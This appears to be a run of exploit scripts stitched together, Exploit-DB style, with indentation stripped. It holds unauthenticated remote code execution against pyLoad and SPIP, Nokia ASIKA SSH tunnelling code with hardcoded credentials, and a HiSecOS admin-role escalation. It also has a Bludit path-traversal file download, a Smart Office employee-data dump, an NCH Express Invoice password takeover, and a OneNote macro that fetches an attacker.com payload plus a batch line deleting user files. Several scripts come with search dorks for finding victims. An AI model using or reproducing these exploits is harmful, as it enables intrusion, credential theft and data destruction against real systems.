import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()
def doRequest(url):
try:
res = requests.get(url + '/flash/addcrypted2')
if res.status_code == 200:
return True
else:
return False
except requests.exceptions.RequestException as e:
print("[!] Maybe the host is offline :", e)
exit()
def runExploit(url, cmd):
endpoint = url + '/flash/addcrypted2'
if " " in cmd:
validCommand = cmd.replace(" ", "%20")
else:
validCommand = cmd
payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
print('[+] The exploit has be executeded in target machine. ')
def main(targetUrl, Command):
print('[+] Check if target host is alive: ' + targetUrl)
alive = doRequest(targetUrl)
if alive == True:
print("[+] Host up, let's exploit! ")
runExploit(targetUrl,Command)
else:
print('[-] Host down! ')
if(arguments.url != None and arguments.cmd != None):
targetUrl = arguments.url
Command = arguments.cmd
main(targetUrl, Command)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)
# Google Dork: inurl:"/spip.php?page=login"
# Date: 19/06/2023
# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)
# Vendor Homepage: https://www.spip.net/
# Software Link: https://files.spip.net/spip/archives/
# Version: < 4.2.1 (Except few fixed versions indicated in the description)
# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0
# CVE reference : CVE-2023-27372 (coiffeur)
# CVSS : 9.8 (Critical)
#
# Vulnerability Description:
#
# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.
#
# Usage: python3 CVE-2023-27372.py http://example.com
import argparse
import bs4
import html
import requests
def parseArgs():
parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")
parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")
parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")
parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")
return parser.parse_args()
def get_anticsrf(url):
r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)
soup = bs4.BeautifulSoup(r.text, 'html.parser')
csrf_input = soup.find('input', {'name': 'formulaire_action_args'})
if csrf_input:
csrf_value = csrf_input['value']
if options.verbose:
print("[+] Anti-CSRF token found : %s" % csrf_value)
return csrf_value
else:
print("[-] Unable to find Anti-CSRF token")
return -1
def send_payload(url, payload):
data = {
"page": "spip_pass",
"formulaire_action": "oubli",
"formulaire_action_args": csrf,
"oubli": payload
}
r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)
if options.verbose:
print("[+] Execute this payload : %s" % payload)
return 0
if __name__ == '__main__':
options = parseArgs()
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
csrf = get_anticsrf(url=options.url)
send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))
// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure
// Date: 2023-06-20
// Exploit Author: Amirhossein Bahramizadeh
// Category : Hardware
// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/
// Version: 7.13.52 (REQUIRED)
// Tested on: Windows/Linux
// CVE : CVE-2023-25187
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <signal.h>
// The IP address of the vulnerable device
char *host = "192.168.1.1";
// The default SSH port number
int port = 22;
// The username and password for the BTS service user account
char *username = "service_user";
char *password = "password123";
// The IP address of the attacker's machine
char *attacker_ip = "10.0.0.1";
// The port number to use for the MITM attack
int attacker_port = 2222;
// The maximum length of a message
#define MAX_LEN 1024
// Forward data between two sockets
void forward_data(int sock1, int sock2)
{
char buffer[MAX_LEN];
ssize_t bytes_read;
while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)
{
write(sock2, buffer, bytes_read);
}
}
int main()
{
int sock, pid1, pid2;
struct sockaddr_in addr;
char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};
// Create a new socket
sock = socket(AF_INET, SOCK_STREAM, 0);
// Set the address to connect to
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
inet_pton(AF_INET, host, &addr.sin_addr);
// Connect to the vulnerable device
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
{
fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));
exit(1);
}
// Send the SSH handshake
write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);
read(sock, NULL, 0);
// Send the username
write(sock, username, strlen(username));
write(sock, "\r\n", 2);
read(sock, NULL, 0);
// Send the password
write(sock, password, strlen(password));
write(sock, "\r\n", 2);
// Wait for the authentication to complete
sleep(1);
// Start an SSH client on the attacker's machine
pid1 = fork();
if (pid1 == 0)
{
execv("/usr/bin/ssh", argv);
exit(0);
}
// Start an SSH server on the attacker's machine
pid2 = fork();
if (pid2 == 0)
{
execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);
exit(0);
}
// Wait for the SSH server to start
sleep(1);
// Forward data between the client and the server
pid1 = fork();
if (pid1 == 0)
{
forward_data(sock, STDIN_FILENO);
exit(0);
}
pid2 = fork();
if (pid2 == 0)
{
forward_data(STDOUT_FILENO, sock);
exit(0);
}
// Wait for the child processes to finish
waitpid(pid1, NULL, 0);
waitpid(pid2, NULL, 0);
// Close the socket
close(sock);
return 0;
}
# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation
# Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation
# Date: 21.06.2023
# Exploit Author: dreizehnutters
# Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016
# Version: HiSecOS-04.0.01 or lower
# Tested on: HiSecOS-04.0.01
# CVE: BSECV-2021-07
#!/bin/bash
if [[ $# -lt 3 ]]; then
echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"
exit 1
fi
target="$1"
user="$2"
pass="$3"
# Craft basic header
auth=$(echo -ne "$user:$pass" | base64)
# Convert to ASCII hex
blob=$(printf "$user" | xxd -ps -c 1)
# Generate XML payload ('15' -> admin role)
gen_payload() {
cat <<EOF
<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20">
<mibOperation xmlns="urn:x-mops:1.0">
<edit-config>
<MIBData>
<MIB name="HM2-USERMGMT-MIB">
<Node name="hm2UserConfigEntry">
<Index>
<Attribute name="hm2UserName">$blob</Attribute>
</Index>
<Set name="hm2UserAccessRole">15</Set>
</Node>
</MIB>
</MIBData>
</edit-config>
</mibOperation>
</rpc>
EOF
}
curl -i -s -k -X POST \
-H "content-type: application/xml" \
-H "authorization: Basic ${auth}" \
--data-binary "$(gen_payload)" \
"https://${target}/mops_data"
echo "[*] $user is now an admin"
# -*- coding: utf-8 -*-
#/usr/bin/env python
# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14
import requests
import argparse
from bs4 import BeautifulSoup #pip3 install beautifulsoup4
def main():
parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
parser.add_argument('-x', '--url', type=str, required=True)
parser.add_argument('-u', '--user', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
parser.add_argument('-f', '--file', type=str, required=True)
args = parser.parse_args()
print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
exploit(args)
def exploit(args):
s2 = requests.Session()
url = args.url.rstrip("/")
#get csrf token
r = s2.get(url+'/admin/')
soup = BeautifulSoup(r.text, 'html.parser')
formtoken = soup.find('input', {'name':'tokenCSRF'})['value']
#login
body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}
r = s2.post(url+'/admin/', data=body, allow_redirects=False)
if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):
print("[*] Login OK")
else:
print("[*] Login Failed")
exit(1)
#arbitrary download
r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)
if(r.status_code==200 and len(r.content)>0):
print("[*] File:")
print(r.text)
else:
print("[*] Exploit Failed")
exit(1)
if __name__ == '__main__':
main()
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
# Date: 09/Dec/2022
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number : CVE-2022-47075 and CVE-2022-47076
# CVSS : 7.5 (High)
# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.
import wget
import os
from colorama import Fore, Style
def download_file(url, filename):
wget.download(url, filename)
# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
print("You have chosen not to agree. Exiting the script.")
exit()
# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL) # Reset color
website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")
# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
os.makedirs(folder_name)
urls_filenames = []
if target_version == "1":
urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
urls_filenames.extend([
(website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
(website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
(website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
(website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
])
print("CVE-2022-47076: Obtain user ID and password from downloaded source")
for url, filename in urls_filenames:
download_file(url, os.path.join(folder_name, filename))
# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL) # Reset color
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious
user can trick the victim into clicking on a very maliciously crafted
URL or download some other malicious file and execute it. When this
happens the game will be over for the victim and his computer will be
compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
vbNormalFocus)
End Sub
```
[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
## Time spend:
01:15:00
--
# Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover
# Google Dork:: intitle:ExpressInvoice - Login
# Date: 07/Apr/2020
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://www.nchsoftware.com/
# Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe
# Version: NCH Express Invoice 8.24 and before
# CVE Number : CVE-2020-11560
# CVSS: 7.8 (High)
# Reference: https://cvewalkthrough.com/cve-2020-11560/
# Vulnerability Description:
# Express Invoice is a thick client application that has functionality to allow the application access over the web. While configuring web access function application ask for user details such as username, password, email, etc. Application stores this information in “C:\ProgramData\NCH Software\ExpressInvoice\Accounts” in clear text as well as due to inadequate folder pemtion any Low prevladge authenticated user can access files stored in cleartext format
#Note: from version 8.24 path changed to “C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts”
import os
import urllib.parse
# Enable ANSI escape sequences for colors on Windows
if os.name == 'nt':
os.system('')
# Function to decode URL encoding
def decode_url(url):
decoded_url = urllib.parse.unquote(url)
return decoded_url
# Function to list files and display as numeric list
def list_files(file_list):
for i, file in enumerate(file_list, start=1):
# Omit the part of the file name after %40
username = file.split("%40")[0]
print(f"{i}. {username}")
# Main program
print("\033[93mDisclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m")
agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m")
if agreement != '1':
print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m")
exit()
nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m")
if nch_version == '1':
file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts"
else:
file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts"
file_list = os.listdir(file_directory)
print("\033[94mUser Accounts:\033[0m")
list_files(file_list)
selected_file = input("\033[94mSelect the file number for the user: \033[0m")
selected_file = int(selected_file) - 1
file_path = os.path.join(file_directory, file_list[selected_file])
with open(file_path, 'r') as file:
contents = file.read()
print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m")
exploit_option = input("\n\033[94mSelect the exploit option: "
"\n1. Display User Passwords "
"\n2. Account Takeover Using Password Replace "
"\n3. User Privilege Escalation\nOption: \033[0m")
# Exploit actions
if exploit_option == "1":
decoded_contents = decode_url(contents)
print("\033[91mPlease find the password in the below string:\033[0m")
print(decoded_contents)
elif exploit_option == "2":
new_password = input("\033[92mEnter the new password: \033[0m")
current_password = contents.split("Password=")[1].split("&")[0]
replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}")
print("\033[92mSelected user's password changed to: Your password\033[0m")
print(replaced_contents)
with open(file_path, 'w') as file:
file.write(replaced_contents)
elif exploit_option == "3":
replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1")
print("\033[92mUser is now an Administrator.\033[0m")
print(replaced_contents)
with open(file_path, 'w') as file:
file.write(replaced_contents)
else:
print("\033[91mInvalid exploit option. Exiting the program.\033[0m")
exit()
print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m")
input("\033[91mPress enter to exit.\033[0m")